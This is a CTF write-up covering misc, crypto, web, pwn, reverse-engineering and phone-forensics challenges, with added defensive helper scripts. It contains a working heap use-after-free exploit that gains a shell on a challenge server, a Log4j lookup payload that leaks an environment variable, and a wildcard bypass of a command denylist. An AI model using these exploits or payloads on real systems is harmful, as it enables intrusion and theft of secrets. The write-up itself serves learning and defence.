Written with reference to my teammates' write-ups. I was in charge of forensics; I blasted through it in under an hour and then sat in jail for the rest of the time. The forensics questions are really absurd, too. Rubbish.

misc

排队队吃果果

The font is colorless, so give it a color first.

image-20230916175437075

The challenge name makes it obvious that sorting is needed, so first convert all text-typed cells to numbers.

image-20230916175518143

Again going by the challenge name, the data has to be sorted. There are 39*39 cells in total, which is clearly a QR code.

Bold versus non-bold should map to 1/0. The first and last columns are entirely non-bold, so the sort must be done by column.

Writing a script would take longer, so I sorted by hand and got:

image-20230916175700847

It already has the shape of a QR code.

Then a quick round with ChatGPT:

```python
import openpyxl

# Open the Excel file
workbook = openpyxl.load_workbook('your_excel_file.xlsx')

# Select the worksheet to work on
worksheet = workbook.active  # or select by name: workbook['Sheet1']

# Walk every cell in the worksheet
for row in worksheet.iter_rows():
    for cell in row:
        # Check whether the cell is bold
        if cell.font.bold:
            # Bold: set the cell value to 1
            cell.value = 1
        else:
            # Not bold: set the cell value to 0
            cell.value = 0

# Save the modified Excel file
workbook.save('modified_excel_file.xlsx')

# Close the workbook
workbook.close()
```

which gives:

```
000000000000000000000000000000000000000
011111110001010101010001100101010101110
010000010011110111100000110111010101100
010111010110100011110000100011010010100
010111010110111111101101010000111111010
010111010010001010010111001111111101000
010000010001001011000111001001000101100
011111110001010011011101010001010110110
000000000010001010111010011011000100010
010111011010110101110011111101111100010
000110000111111101111111111111100101110
010110011101010101110000111110010001100
001110101001000101001010011001111010000
010101111110010101100011001010110101010
011010001011111110010001100001011000000
011000111100100000101111010101010111100
001110100110100111110011111010111010000
011101110000011110010001010011101101100
001111100100010001111000101101100011110
010101110111111011100111010111000101100
000001100011000001000101001110100000000
001000010011011101101011100000011110100
001011101001010110111011111100100110110
010010011110111110010011111101000111100
011000000001011000111101001110010011010
001110111010110000011010010100010000000
010111100000000101100111010000010110100
011001010010000000110000100000101101000
011101001001011111011001010001010101100
000110010010011100001010001011110110000
000000000110101000101000001001000000000
011111110101010101010101010101011111110
010000010001000111110111000100010000010
010111010100110100111000111010010111010
010111010111000000110101001010010111010
010111010001010010011011100100010111010
010000010000111101111111011100010000010
011111110001000011111111111111011111110
000000000000000000000000000000000000000
```

Convert it to a QR code and scan it.

image-20230916175859441
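Before rendering a hand-sorted grid like this one, it is worth checking that it really has QR structure: a QR symbol carries a 7x7 finder pattern at three of its four corners, and a grid that was sorted column by column can easily come out flipped or rotated. The script below is an added example, not part of the original write-up: it parses the 0/1 grid above (embedded verbatim), reports which corners hold a finder, generates the orientations that put the finders where a scanner expects them (top-left, top-right, bottom-left), and writes each one as a plain PBM image. Everything except the grid itself (function names, the one-module quiet zone, the PBM output) is an assumption of this example.

```python
# Added example (not the write-up's code): sanity-check a 0/1 grid as a QR symbol.
# GRID_TEXT is the 39x39 grid from the write-up; all other names are assumed here.
GRID_TEXT = """
000000000000000000000000000000000000000
011111110001010101010001100101010101110
010000010011110111100000110111010101100
010111010110100011110000100011010010100
010111010110111111101101010000111111010
010111010010001010010111001111111101000
010000010001001011000111001001000101100
011111110001010011011101010001010110110
000000000010001010111010011011000100010
010111011010110101110011111101111100010
000110000111111101111111111111100101110
010110011101010101110000111110010001100
001110101001000101001010011001111010000
010101111110010101100011001010110101010
011010001011111110010001100001011000000
011000111100100000101111010101010111100
001110100110100111110011111010111010000
011101110000011110010001010011101101100
001111100100010001111000101101100011110
010101110111111011100111010111000101100
000001100011000001000101001110100000000
001000010011011101101011100000011110100
001011101001010110111011111100100110110
010010011110111110010011111101000111100
011000000001011000111101001110010011010
001110111010110000011010010100010000000
010111100000000101100111010000010110100
011001010010000000110000100000101101000
011101001001011111011001010001010101100
000110010010011100001010001011110110000
000000000110101000101000001001000000000
011111110101010101010101010101011111110
010000010001000111110111000100010000010
010111010100110100111000111010010111010
010111010111000000110101001010010111010
010111010001010010011011100100010111010
010000010000111101111111011100010000010
011111110001000011111111111111011111110
000000000000000000000000000000000000000
"""

FINDER = ("1111111", "1000001", "1011101", "1011101", "1011101", "1000001", "1111111")


def parse_grid(text):
    """Lines of 0/1 characters -> square boolean matrix (True = dark module)."""
    rows = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    n = len(rows)
    if n == 0 or any(len(r) != n or set(r) - {"0", "1"} for r in rows):
        raise ValueError("grid must be square and contain only 0/1 characters")
    return [[ch == "1" for ch in r] for r in rows]


def has_finder(grid, top, left):
    """True if the 7x7 block at (top, left) is exactly a QR finder pattern."""
    return all(grid[top + i][left + j] == (FINDER[i][j] == "1")
               for i in range(7) for j in range(7))


def finder_corners(grid, quiet=1):
    """Names of the corners (inside a `quiet`-module border) that hold a finder."""
    lo, hi = quiet, len(grid) - quiet - 7
    corners = {"TL": (lo, lo), "TR": (lo, hi), "BL": (hi, lo), "BR": (hi, hi)}
    return {name for name, (t, l) in corners.items() if has_finder(grid, t, l)}


def orientations(grid):
    """The eight rotations/reflections of a square grid."""
    for g in (grid, [row[::-1] for row in grid]):      # original and its mirror image
        for _ in range(4):
            yield g
            g = [list(col) for col in zip(*g[::-1])]   # rotate 90 degrees clockwise


def normalize(grid, quiet=1):
    """Orientations with finders at TL/TR/BL. Finders alone cannot tell a rotation
    from a mirror image, so two candidates come back; scanners usually read both."""
    return [g for g in orientations(grid) if finder_corners(g, quiet) == {"TL", "TR", "BL"}]


def to_pbm(grid, scale=8):
    """Render the grid as a plain-text PBM (P1) image, `scale` pixels per module."""
    n = len(grid)
    lines = ["P1", f"{n * scale} {n * scale}"]
    for row in grid:
        pixels = " ".join(("1" if dark else "0") for dark in row for _ in range(scale))
        lines.extend([pixels] * scale)
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    grid = parse_grid(GRID_TEXT)
    print("finders found at:", sorted(finder_corners(grid)))  # ['BL', 'BR', 'TL'] for this grid
    for idx, g in enumerate(normalize(grid)):
        with open(f"qr_candidate{idx}.pbm", "w") as fh:
            fh.write(to_pbm(g))
        print(f"wrote qr_candidate{idx}.pbm")
```

For the grid above the finders turn up at top-left, bottom-left and bottom-right, i.e. the hand sort produced a vertically flipped symbol; the vertical flip and the clockwise rotation are the two candidates written out. Any image viewer or ImageMagick can convert the PBM files to PNG for a phone scanner.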

Crypto

ezrsa

It's the original challenge, nothing much to say; not even the equation data was changed.

AiDai|CryptoCTF2019-Writeup (aidaip.github.io)

Copy that over to get p and q, swap in c and e, and it falls out directly.

```python
import libnum
from Crypto.Util.number import long_to_bytes

p = 12604273285023995463340817959574344558787108098986028639834181397979984443923512555395852711753996829630650627741178073792454428457548575860120924352450409
q = 12774247264858490260286489817359549241755117653791190036750069541210299769639605520977166141575653832360695781409025914510310324035255606840902393222949771
n = 161010103536746712075112156042553283066813155993777943981946663919051986586388748662616958741697621238654724628406094469789970509959159343108847331259823125490271091357244742345403096394500947202321339572876147277506789731024810289354756781901338337411136794489136638411531539112369520980466458615878975406339
c = 15380535750650959213679345560658190067564859611922563753882617419201718847747207949211621591882732604480600745000879508274349808435529637573773711729853565120321608048340424321537282281161623712479117497156437792084977778826238039385697230676340978078264209760724043776058017336241110097549146883806481148999

e = 0x10001

d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n)
string = long_to_bytes(m)
print(string)
# flag{2a5a9c6fe94da5ef7edeffebb506b29a}
```
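When factors are copied from an older write-up, the one check worth doing before trusting them is that they actually multiply to the modulus in front of you, and that e is invertible modulo phi(n). The following is an added example, not the write-up's script or the challenge's code: it performs those checks and decrypts with the CRT (Garner) recombination that real RSA implementations use, alongside the plain pow(c, d, n) form used above. The key values are a constructed toy instance (the textbook p=61, q=53 pair); substitute the challenge's p, q, e and c to reuse it.

```python
# Added example (not from the write-up): validate leaked RSA factors, then decrypt.
# Toy key below is constructed; function names are this example's own.
from math import gcd


def rsa_private_exponent(p, q, e):
    """Return d = e^-1 mod phi(n), refusing inconsistent parameters."""
    if p == q or p < 2 or q < 2:
        raise ValueError("p and q must be two distinct primes")
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e is not invertible modulo phi(n)")
    return pow(e, -1, phi)


def rsa_decrypt_crt(p, q, e, c, n=None):
    """Decrypt c via CRT; if n is given it must equal p*q or the factors are not for this key."""
    if n is not None and p * q != n:
        raise ValueError("p*q != n: these factors do not belong to this modulus")
    d = rsa_private_exponent(p, q, e)
    dp, dq = d % (p - 1), d % (q - 1)          # exponents reduced modulo p-1 and q-1
    qinv = pow(q, -1, p)                       # q^-1 mod p for Garner recombination
    mp, mq = pow(c, dp, p), pow(c, dq, q)      # two small exponentiations instead of one big one
    h = (qinv * (mp - mq)) % p
    return mq + h * q


def rsa_decrypt_plain(p, q, e, c):
    """Same result without the CRT, as the write-up's script computes it."""
    return pow(c, rsa_private_exponent(p, q, e), p * q)


TOY_P, TOY_Q, TOY_E = 61, 53, 17   # constructed toy key, n = 3233, d = 2753
TOY_C = 2790                       # ciphertext of m = 65 under that key

if __name__ == "__main__":
    m = rsa_decrypt_crt(TOY_P, TOY_Q, TOY_E, TOY_C, n=TOY_P * TOY_Q)
    print(m, m.to_bytes((m.bit_length() + 7) // 8, "big"))
```

The p*q != n guard is the check that would have caught a changed modulus if the organizers had altered the data: with the 2019 factors and a new n, the script above would happily print garbage instead of failing.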

web

MyLinuxBot

Again the original challenge:

Write-Up: Web - Log4j & Log4j2 from Google CTF 2022 | SIGFLAG

Only the variable names were lightly obfuscated.

Payload ${java:${env:FLAG}}, fired directly:

image-20230916214506775
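The payload works because Log4j evaluates ${...} lookups inside logged message text, and lookups nest, so an inner ${env:FLAG} is expanded before the outer ${java:...}. From the defensive side, the same property makes such input easy to spot in logs or request telemetry. The detector below is an added example, not part of the write-up or of the challenge: it finds balanced ${...} expressions in a line, reports their nesting depth and the lookup prefixes used, and scans a few constructed access-log lines. All names and the sample lines are this example's own.

```python
# Added example (not from the write-up): detect Log4j-style ${...} lookup
# expressions in untrusted input. SAMPLE_LOG lines are constructed.
import re

PREFIX_RE = re.compile(r"\$\{([A-Za-z0-9_]+):")


def extract_lookups(text):
    """Return (depth, expression) for every balanced ${...} in text, innermost first."""
    found, stack, i = [], [], 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i)
            i += 2
            continue
        if text[i] == "}" and stack:
            start = stack.pop()
            found.append((len(stack) + 1, text[start:i + 1]))
        i += 1
    return found


def lookup_prefixes(text):
    """Lookup names used, e.g. {'java', 'env'} for ${java:${env:FLAG}}."""
    names = set()
    for _, expr in extract_lookups(text):
        m = PREFIX_RE.match(expr)
        if m:
            names.add(m.group(1).lower())
    return names


def max_depth(text):
    """Deepest nesting level of lookups in text (0 when there are none)."""
    return max((d for d, _ in extract_lookups(text)), default=0)


def scan_log(lines):
    """(index, depth, sorted prefixes) for every line that carries a lookup."""
    hits = []
    for idx, line in enumerate(lines):
        if extract_lookups(line):
            hits.append((idx, max_depth(line), sorted(lookup_prefixes(line))))
    return hits


SAMPLE_LOG = [  # constructed access-log lines; the user-agent field is client-controlled
    '10.0.0.5 - - "GET /?q=linux HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${java:${env:FLAG}}"',
    '10.0.0.7 - - "GET /price?total=$100 HTTP/1.1" 200 "curl/8.0"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${env:PATH}"',
]

if __name__ == "__main__":
    for idx, depth, names in scan_log(SAMPLE_LOG):
        print(f"line {idx}: depth={depth} lookups={names}")
```

A lone "$" or a stray "}" (the third line) does not trigger, while both lookup-carrying lines do, the nested one at depth 2. In a real deployment the fix is not detection but never evaluating lookups in message text: current Log4j 2 releases do not, and on older 2.10+ releases the log4j2.formatMsgNoLookups=true setting turns it off.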

pwn

uaf

As the challenge description says, there is a UAF. It is used for a tcache bin attack.

image-20230916215754512

The exploit is attached directly.

```python
from pwncy import *
context(log_level = "debug",arch = "amd64")
filename = "main"
remote_libc = "./libc-2.31.so"
ip_port = "120.78.172.238:42687"
p,elf,libc = load(filename,remote_libc = remote_libc,ip_port = ip_port)
def cmd(choice):
    # pass
    sla(">> \n",str(choice))
def add(size,content):
    cmd(1)
    sla("Tell me the book content size: \n",str(size))
    sa("Tell me the book content: \n",content)
def delete(index):
    cmd(2)
    sla("Tell me the book index: \n",str(index))
def change(index,content):
    cmd(3)
    sla("Tell me the book index: \n",str(index))
    sla("Tell me the book content: \n",content)

def show():
    cmd(4)
def login(password = b"1234567890"):
    cmd(5)
    sa("Passwd: \n",password)

def hack(name,ptr,address,mode = 2):
    sla("Tell me ur name: \n",name) #8 bytes #$p$19$p
    sla(">> \n",mode)
    sa("READ MODE: \n",ptr)
    s(address)
debug(p,'no-tmux','pie',0x1386,0x1429)
add(0x500,b"A")
add(0x500,b"b")
delete(0)
show()
main_arena = recv_libc()
libc_base = main_arena - 96 - 0x10 - libc.sym.__malloc_hook
libc.address = libc_base
free_hook = libc.sym.__free_hook
add(0x10,b"aaaaaaaaaaaaaaaa") #2
show()
ru("aaaaaaaaaaaaaaaa")
heap1 = u64(r(6).ljust(8,b"\x00"))
log_addr("heap1")
heap_base = heap1 - 0x290
add(0x10,b"A" * 0x10) #3

delete(3)
delete(0)
pause()
change(2,flat([p64(free_hook),p64(heap_base + 0x10)]))
pause()
add(0x10,b"b")
add(0x10,b'c') #5
change(5,flat([p64(libc_base + search_og(1))]))

delete(0)
itr()
```

image-20230916220700949

admin

Only the straightforward approach is covered here: decompile to get the menu options, and first look at option 5, cmd.

image-20230916220014286

Looking at the logic of the cmd option: up to 0x100 bytes of command can be entered and are stored in the array buf. The program checks the characters in buf two at a time for "sh" and four at a time for "flag"; if neither string is present, it executes the command. A wildcard can therefore stand in for the characters of flag to read the flag.

image-20230916220123485

The steps can be scripted, but doing it interactively is even more convenient.

```python
from pwncy import *
context(log_level = "debug",arch = "amd64")
filename = "./main"
remote_libc = "./libc-2.31.so"
ip_port = "39.108.165.189:41548"
p,elf,libc = load(filename,remote_libc = remote_libc,ip_port = ip_port)
def cmd(choice):
    sla(">> \n",str(choice))
debug(p,'no-tmux','pie',0x1D84)

cmd(5)
command = b"cat fla*"
sla("Command: \n",command)
itr()
```

image-20230916220826976
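The lesson in this challenge is a general one: a denylist that looks for the strings "sh" and "flag" in a command says nothing about what the shell will do with the rest of the line, because globbing, quoting and variable expansion all happen after the check. The snippet below is an added example, not the challenge binary or the write-up's script: it reconstructs the described check as sliding-window substring matching (an assumption about the binary's exact logic), and next to it an allowlist policy that parses the line like a shell, accepts only known programs with plain arguments, and runs them without a shell at all. The allowed program set and the argument pattern are this example's own choices.

```python
# Added example (not from the write-up): the denylist check as described,
# reconstructed as sliding-window matching, beside an allowlist policy.
import re
import shlex
import subprocess


def naive_filter(command):
    """Reconstruction (assumption) of the challenge's check: reject 'sh' in any
    2-char window and 'flag' in any 4-char window, otherwise allow."""
    if any(command[i:i + 2] == "sh" for i in range(len(command) - 1)):
        return False
    if any(command[i:i + 4] == "flag" for i in range(len(command) - 3)):
        return False
    return True


ALLOWED_PROGRAMS = {"ls", "date", "uptime"}      # hypothetical allowlist for this example
SAFE_ARG = re.compile(r"^[A-Za-z0-9_.-]+$")      # no glob characters, slashes, quotes or spaces


def strict_policy(command):
    """(allowed, reason): shell-style tokenization, then allowlisted program and plain args only."""
    try:
        argv = shlex.split(command)
    except ValueError as err:
        return False, f"unparseable: {err}"
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        return False, "program not in allowlist"
    for arg in argv[1:]:
        if not SAFE_ARG.match(arg):
            return False, f"argument rejected: {arg!r}"
    return True, "ok"


def run_checked(command):
    """Run only what strict_policy allows, and never through a shell, so '*' stays literal."""
    allowed, reason = strict_policy(command)
    if not allowed:
        raise PermissionError(reason)
    return subprocess.run(shlex.split(command), capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    for line in ("cat flag", "cat fla*", "ls -l"):
        print(f"{line!r}: denylist={naive_filter(line)} allowlist={strict_policy(line)}")
```

"cat flag" is stopped by both checks, "cat fla*" passes the denylist and is stopped by the allowlist twice over (unknown program, glob character), and "ls -l" passes the allowlist. Running the argv list with subprocess rather than a shell string is what makes the argument pattern meaningful: there is no shell left to expand a wildcard.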

re

justamat

image-20230916223242053

At the start, v0 is assigned there_are_a_lot_useless_information_but_oh.o0O_

Then come the output and input steps.

image-20230916223303130

Here v14 is the input length; the flow is chosen based on that length, and here it should be greater than 15.

image-20230916223319608

Here strings are concatenated; dynamic debugging shows it is simply str1+input+str2.

Then a do...while loop iterates over it and stores str1+input+str2 into v5, which is the later v16.

Then it enters this function.

image-20230916223505505

The values are extracted two bytes at a time.

image-20230916223524696

This do...while loop is the main logic.

Solve it directly with z3:

```python
from z3 import *
s = Solver()
flag = [Int("flag%d" % i) for i in range(100)]
a = [0x0001C633, 0x0001DF94, 0x00020EBF, 0x0002BA40, 0x0001E884, 0x000260D1, 0x0001F9B1, 0x0001EA1A, 0x0001EEAA, 0x0001DFB2, 0x0001C1D0, 0x0001EEF2, 0x000216E1, 0x0002BE00, 0x0001FB5E, 0x00025D74, 0x0001F000, 0x000202D6, 0x00020002, 0x0001DDFE, 0x0001C017, 0x0001F08C, 0x000227F6, 0x0002C7BA, 0x000201AE, 0x00027FBF, 0x00020E21, 0x0001FF5C, 0x0001FD62, 0x0001E948, 0x0001BE6E, 0x0001F4D7, 0x00022C8D, 0x0002C353, 0x0001F8DB, 0x00026E1D, 0x0001FF61, 0x0001EA0F, 0x0001F0D6, 0x0001EDA8, 0x0001AD7D, 0x00018218, 0x0001CCD4, 0x000239B6, 0x0001AC4C, 0x00020D7C, 0x0001D967, 0x0001A4F4, 0x0001CAD8, 0x000196AE, 0x0001831B, 0x00017E45, 0x0001D0CF, 0x00023EDF, 0x000181AE, 0x00021760, 0x0001D3B4, 0x000175D6, 0x00017D3A, 0x0001994F, 0x0001189D, 0x00014CCF, 0x0001568E, 0x00017EEB, 0x0001327E, 0x00016A45, 0x00012921, 0x00011FF0, 0x00013643, 0x00011729, 0x00015191, 0x00017D17, 0x00017262, 0x0001A863, 0x00017010, 0x00017B10, 0x00014F9C, 0x000143E8, 0x00015E9B, 0x0001242C, 0x0000F68C, 0x0001192A, 0x000150AD, 0x0001B1A0, 0x00014C60, 0x000182AB, 0x00013F4B, 0x000141A6, 0x00015AA3, 0x000135C9, 0x0001D86F, 0x0001E8FA, 0x0002158D, 0x0002BDAC, 0x00020E4F, 0x00027EE6, 0x000213B9, 0x00020E86, 0x000211FF, 0x0001E1EF]
b = [0x000000FE, 0x0000000B, 0x0000001D, 0x000000F6, 0x00000083, 0x000000FF, 0x000000E0, 0x000000B8, 0x000000DD, 0x000000B0, 0x000000C5, 0x000000DE, 0x000000F6, 0x00000014, 0x0000009F, 0x000000DD, 0x000000D9, 0x00000007, 0x0000002D, 0x0000006B, 0x00000019, 0x000000CA, 0x00000073, 0x000000FD, 0x00000087, 0x00000072, 0x00000024, 0x00000004, 0x00000049, 0x0000007E, 0x000000A9, 0x000000CE, 0x00000091, 0x000000BE, 0x00000041, 0x00000018, 0x00000060, 0x0000003F, 0x0000002B, 0x00000063, 0x0000001C, 0x000000D2, 0x00000090, 0x000000E9, 0x0000008E, 0x000000BA, 0x0000001E, 0x000000F3, 0x00000041, 0x000000AD, 0x0000002C, 0x00000003, 0x00000069, 0x000000DA, 0x00000010, 0x000000FD, 0x000000FD, 0x000000E7, 0x00000006, 0x00000036, 0x000000D6, 0x00000002, 0x00000059, 0x00000018, 0x000000CC, 0x00000050, 0x00000087, 0x000000AF, 0x000000FB, 0x00000018, 0x00000044, 0x0000007F, 0x000000AD, 0x000000F8, 0x0000002C, 0x00000067, 0x0000001D, 0x00000022, 0x00000084, 0x000000AC, 0x0000000E, 0x00000023, 0x000000DC, 0x000000E6, 0x000000BB, 0x000000D2, 0x000000B8, 0x0000004A, 0x000000BC, 0x000000DE, 0x00000050, 0x0000009C, 0x0000001C, 0x0000001E, 0x00000086, 0x0000003A, 0x0000002D, 0x000000DD, 0x000000C3, 0x00000003]

print(len(a))
# A[j][k] = sum over m of flag[j*10+m] * b[k+m*10]: a 10x10 matrix product
for j in range(10):
    for k in range(10):
        i = k
        v8 = 0
        for m in range(10):
            v9 = flag[j*10+m] * b[i+m*10]
            #i += 10
            v8 += v9
        s.add(v8 == a[k+j*10])

if s.check() == sat:
    m = s.model()
    for f in flag:
        print(chr(m[f].as_long()), end='')
```
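The constraint set above is a plain linear system: with the 100 input bytes viewed as a 10x10 matrix F (row-major) and B[m][k] = b[k + m*10], the binary computes A = F * B and compares it to the stored a table. That means no SMT solver is needed; exact rational Gaussian elimination recovers F row by row, and the result can be checked by re-running the binary's own multiply-accumulate loop. The script below is an added example, not the write-up's solver: A_CHECK and B_KEY are the a and b arrays copied from the z3 script above, while the function names and the elimination routine are this example's own.

```python
# Added example (not from the write-up): solve F * B = A exactly without z3.
# A_CHECK / B_KEY are the write-up's a / b tables; everything else is assumed here.
from fractions import Fraction

A_CHECK = [0x0001C633, 0x0001DF94, 0x00020EBF, 0x0002BA40, 0x0001E884, 0x000260D1, 0x0001F9B1, 0x0001EA1A, 0x0001EEAA, 0x0001DFB2, 0x0001C1D0, 0x0001EEF2, 0x000216E1, 0x0002BE00, 0x0001FB5E, 0x00025D74, 0x0001F000, 0x000202D6, 0x00020002, 0x0001DDFE, 0x0001C017, 0x0001F08C, 0x000227F6, 0x0002C7BA, 0x000201AE, 0x00027FBF, 0x00020E21, 0x0001FF5C, 0x0001FD62, 0x0001E948, 0x0001BE6E, 0x0001F4D7, 0x00022C8D, 0x0002C353, 0x0001F8DB, 0x00026E1D, 0x0001FF61, 0x0001EA0F, 0x0001F0D6, 0x0001EDA8, 0x0001AD7D, 0x00018218, 0x0001CCD4, 0x000239B6, 0x0001AC4C, 0x00020D7C, 0x0001D967, 0x0001A4F4, 0x0001CAD8, 0x000196AE, 0x0001831B, 0x00017E45, 0x0001D0CF, 0x00023EDF, 0x000181AE, 0x00021760, 0x0001D3B4, 0x000175D6, 0x00017D3A, 0x0001994F, 0x0001189D, 0x00014CCF, 0x0001568E, 0x00017EEB, 0x0001327E, 0x00016A45, 0x00012921, 0x00011FF0, 0x00013643, 0x00011729, 0x00015191, 0x00017D17, 0x00017262, 0x0001A863, 0x00017010, 0x00017B10, 0x00014F9C, 0x000143E8, 0x00015E9B, 0x0001242C, 0x0000F68C, 0x0001192A, 0x000150AD, 0x0001B1A0, 0x00014C60, 0x000182AB, 0x00013F4B, 0x000141A6, 0x00015AA3, 0x000135C9, 0x0001D86F, 0x0001E8FA, 0x0002158D, 0x0002BDAC, 0x00020E4F, 0x00027EE6, 0x000213B9, 0x00020E86, 0x000211FF, 0x0001E1EF]
B_KEY = [0x000000FE, 0x0000000B, 0x0000001D, 0x000000F6, 0x00000083, 0x000000FF, 0x000000E0, 0x000000B8, 0x000000DD, 0x000000B0, 0x000000C5, 0x000000DE, 0x000000F6, 0x00000014, 0x0000009F, 0x000000DD, 0x000000D9, 0x00000007, 0x0000002D, 0x0000006B, 0x00000019, 0x000000CA, 0x00000073, 0x000000FD, 0x00000087, 0x00000072, 0x00000024, 0x00000004, 0x00000049, 0x0000007E, 0x000000A9, 0x000000CE, 0x00000091, 0x000000BE, 0x00000041, 0x00000018, 0x00000060, 0x0000003F, 0x0000002B, 0x00000063, 0x0000001C, 0x000000D2, 0x00000090, 0x000000E9, 0x0000008E, 0x000000BA, 0x0000001E, 0x000000F3, 0x00000041, 0x000000AD, 0x0000002C, 0x00000003, 0x00000069, 0x000000DA, 0x00000010, 0x000000FD, 0x000000FD, 0x000000E7, 0x00000006, 0x00000036, 0x000000D6, 0x00000002, 0x00000059, 0x00000018, 0x000000CC, 0x00000050, 0x00000087, 0x000000AF, 0x000000FB, 0x00000018, 0x00000044, 0x0000007F, 0x000000AD, 0x000000F8, 0x0000002C, 0x00000067, 0x0000001D, 0x00000022, 0x00000084, 0x000000AC, 0x0000000E, 0x00000023, 0x000000DC, 0x000000E6, 0x000000BB, 0x000000D2, 0x000000B8, 0x0000004A, 0x000000BC, 0x000000DE, 0x00000050, 0x0000009C, 0x0000001C, 0x0000001E, 0x00000086, 0x0000003A, 0x0000002D, 0x000000DD, 0x000000C3, 0x00000003]


def solve_linear(M, v):
    """Solve M x = v exactly over the rationals by Gauss-Jordan elimination."""
    n = len(M)
    aug = [[Fraction(x) for x in row] + [Fraction(v[i])] for i, row in enumerate(M)]
    for col in range(n):
        pivot = next((r for r in range(col, n) if aug[r][col] != 0), None)
        if pivot is None:
            raise ValueError("matrix is singular: the check does not pin down a unique input")
        aug[col], aug[pivot] = aug[pivot], aug[col]
        inv = 1 / aug[col][col]
        aug[col] = [x * inv for x in aug[col]]
        for r in range(n):
            if r != col and aug[r][col] != 0:
                factor = aug[r][col]
                aug[r] = [x - factor * y for x, y in zip(aug[r], aug[col])]
    return [row[n] for row in aug]


def recover_input(a, b, n=10):
    """Invert A = F*B one row at a time: B^T * F[j]^T = A[j]^T for each input row j."""
    B = [b[m * n:(m + 1) * n] for m in range(n)]       # B[m][k] = b[k + m*n], as in the binary
    BT = [list(col) for col in zip(*B)]
    out = []
    for j in range(n):
        row = solve_linear(BT, a[j * n:(j + 1) * n])
        if any(x.denominator != 1 for x in row):
            raise ValueError(f"row {j} has no integer solution")
        out.extend(int(x) for x in row)
    return out


def check_matches(a, b, f, n=10):
    """Re-run the binary's multiply-accumulate loop to confirm f reproduces a."""
    return all(sum(f[j * n + m] * b[k + m * n] for m in range(n)) == a[k + j * n]
               for j in range(n) for k in range(n))


if __name__ == "__main__":
    f = recover_input(A_CHECK, B_KEY)
    assert check_matches(A_CHECK, B_KEY, f)
    print(bytes(f).decode())   # starts with the str1 prefix shown earlier in this section
```

Because B is square and invertible, the solution is unique, which is also why the recovered text must begin with the there_are_a_lot_useless_information_but_oh.o0O_ prefix that the binary prepends to the input. The singular-matrix branch is the case to watch for when reusing this on a different binary: a rank-deficient B would leave the input underdetermined and an SMT solver would then return one of many satisfying assignments.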

Forensics

1. When this year did extraction of the evidence data begin? (Answer format: 04-12 13:26)

09-11 17:21

image-20230916182033999

2. How many GB of storage does the suspect's phone SD card have in total? (Answer format: 22.5)

24.3. The correct answer should be 24.32 GB.

All I can say is the challenge author is purely ** absurd; keeping one decimal place, as the answer format shows, was marked wrong.

image-20230916182413548

3. What is the device name of the suspect's phone? (Answer format: adfer)

sailfish

image-20230916182559887

4. What is the IMEI of the suspect's phone? (Answer format: 3843487568726387)

352531082716257

image-20230916182631030

5. Which database file holds the contacts data of the suspect's phone? (Answer format: call.db)

contacts.db

Just browse through manually.

image-20230916182718423

image-20230916182806576

It matches the forensic tool's result.

image-20230916182826573

6. How many apps in total have been used on the suspect's phone? (Answer format: 22)

99. The correct answer (though not what I consider correct) should be 206.

Another absurd question, is all I can say.

The app list has 206 entries, and the organizers apparently took that as the correct answer.

image-20230916222124808

But many apps have no last-used time at all; they were installed and never used.

image-20230916182946226

My approach was to export to Excel, filter out the blank rows to find the apps that had actually been used, and, noticing that some apps appear more than once in the log, remove the duplicates, giving 99. I won't paste screenshots of the process; not worth it.

7. What is the package name of the test APK? (Answer format: con.tencent.com)

com.example.myapplication

The APK name is obviously a test app.

image-20230916183251264

Throw it into an emulator and open it: qax2023, obviously the one. LDPlayer resolves the package name.

image-20230916183320152

8. What signature algorithm does the test APK use? (Answer format: AES250)

SHA256. The correct answer is SHA256withRSA.

No comment, another purely absurd question.

image-20230916221919909

9. What is the main entry point of the test APK? (Answer format: com.tmp.mainactivity)

com.example.myapplication.MainActivity

image-20230916183541654

image-20230916183616771

10. How many permissions does the test APK request in total? (Answer format: 7)

3

I hesitated on this one for quite a while, unsure whether it was 2 or 3.

This extra one that turns up in a search also counts as a permission, so count it.

image-20230916183734303

11. What encryption does the test APK apply to the data in Calllog.txt? (Answer format: DES)

Base64 and BASE64 were both wrong; I still don't know the correct answer. Maybe base64??? (If it is that, the challenge author themselves)

Yet another absurd-as-hell question whose answer format is anyone's guess.

Search for the file name directly in jadx.

image-20230916183933016

Obviously base64.

image-20230916184006140

12. How many times did 10086 call the suspect? (Answer format: 5)

2

Too lazy to browse for it; a global search with Everything for the file location.

image-20230916210722700

image-20230916222850644

13. How many times does the test APK encrypt the SMS records? (Answer format: 5)

2

Right below the call-log part is the SMS encryption: clearly one AES pass and one base64 pass.

image-20230916211230701

14. What key does the test APK use to encrypt the SMS records? (Answer format: slkdjlfslskdnln)

bGlqdWJkeWhmdXJp

The key is obtained through the Getkey function.

image-20230916211639295

Following it: the method is declared native, so its body should be in the .so file.

image-20230916211753857

Rename the APK to .zip, extract it, and reverse the .so file.

The function entry can be found by searching for getkey or for java.

image-20230916212528277

First part:

image-20230916213004046

Following first leads to the string lijubdyhfurindhcbxdw.

image-20230916212949273

What follows is obviously base64.

image-20230916213040239

Verify against the encoding table in reverse.

image-20230916212804869

So the key should be the base64 encoding of that string, and given the AES key sizes, the first 16 characters of it:

bGlqdWJkeWhmdXJp

Decryption succeeded.

image-20230916213431886

15. What was the verification code the suspect used to log in to Alipay in 2021? (Answer format: 3464)

9250

From the decryption result in the image above: 9250.